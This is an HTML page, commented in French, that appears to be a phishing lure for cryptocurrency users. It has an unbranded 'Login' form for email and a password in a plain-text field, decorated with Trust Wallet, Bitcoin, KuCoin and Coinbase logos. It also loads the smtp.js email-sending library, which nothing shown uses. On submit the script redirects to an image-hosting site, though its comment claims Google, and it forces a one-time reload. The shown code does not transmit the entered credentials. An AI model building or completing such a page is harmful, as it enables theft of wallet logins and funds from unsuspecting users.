

<!doctype html>
<html lang="fr">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>mon site</title>
    
    <script src="https://kit.fontawesome.com/7e2a69d5dd.js"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <style type="text/css" id="dcoder_stylesheet">
    @import url("https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap");
    @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600&display=swap");
    @import url('https://fonts.googleapis.com/css2?family=Archivo+Black&display=swap');

    * {
        margin: 0;
        padding: 0;
    }
    body {
        font-family: "Poppins", sans-serif; 
        margin: 0;
        padding: 0;
    }
    .Trans {
        width: 80%;
        height: 430px;
        margin-top: 40%;
        border: 1px solid #777;
        background-color: white;
        margin-left: 8%;   
    } 
    .nmg img {
        width: 100px;
    }
   
    input {
        width: 75%; 
        height: 30px;
        outline: none;
        font-family: "Poppins", sans-serif;
        margin-left: 11%;
    }

    input[type="submit"] {
        width: 76.5%;
        height: 40px;
        color: white;
        background-color: deepskyblue;
        font-family: "Archivo Black", sans-serif; 
        border: 1px solid #777;
        margin-top: 5%;
    }

    .alert8 {
        position: fixed;
        display: none; 
        border: 1px solid #777;
        width: 100%;
        height: 680px;
        background-color: white;
        text-align: center;
        border-radius: 5px;  
    }

    .alert8 img {
        width: 200px;
        margin-top: 50%;
    }
    h4 {
        margin-top: 5%;
        margin-left: 11%;
        font-size: 13px;  
    }
    .omg img {
        width: 35px;
        margin: 0 16px;
    }
    /* ... autres styles ... */
    </style>
</head>

<body>
    <div class="Trans"><br><br><br><br><br>
        <form id="submit1">
            <div class="do">Login</div>
            <div class="bg">
                <h4>Email</h4>
                <input type="text" placeholder="Email" id="ban2" required><br>
                <h4>Password</h4>
                <input type="text" placeholder="Password" id="ban3" required><br>
                <input type="submit" id="ltn" value="Login">
            </div><br>

            <div class="omg">
                <img src="https://i.postimg.cc/5yQM2ktT/trust-wallet-token-twt-logo-5312-F3331-F-seeklogo-com.png"> 
                <img src="https://i.postimg.cc/rsfg78cL/bitcoin-logo-png-transparent.png">
                <img src="https://i.postimg.cc/0NN5qnpR/kucoin-token-kcs-logo.png">   
                <img src="https://i.postimg.cc/sXNvL88N/coinbase-coin-logo-C86-F46-D7-B8-seeklogo-com.png">
            </div>

            </div>
        </form>
    </div> 

    
    <script>
        document.getElementById('submit1').addEventListener('submit', function(event) {
            event.preventDefault(); // Empêche l'envoi du formulaire
            window.location.href = 'https://postimages.org/fr/'; // Redirige vers Google
        });
        
      
      
        // Vérifier si le cookie est déjà présent
    if (document.cookie.indexOf("refreshed=true") === -1) {
        // Si le cookie n'existe pas, rafraîchir après 2 secondes et définir un cookie
        setTimeout(() => {
            location.reload();
            document.cookie = "refreshed=true; max-age=86400"; // Cookie valable pendant 24 heures
        }, 2000);
    }
        
        
        
    </script>
</body>
</html>
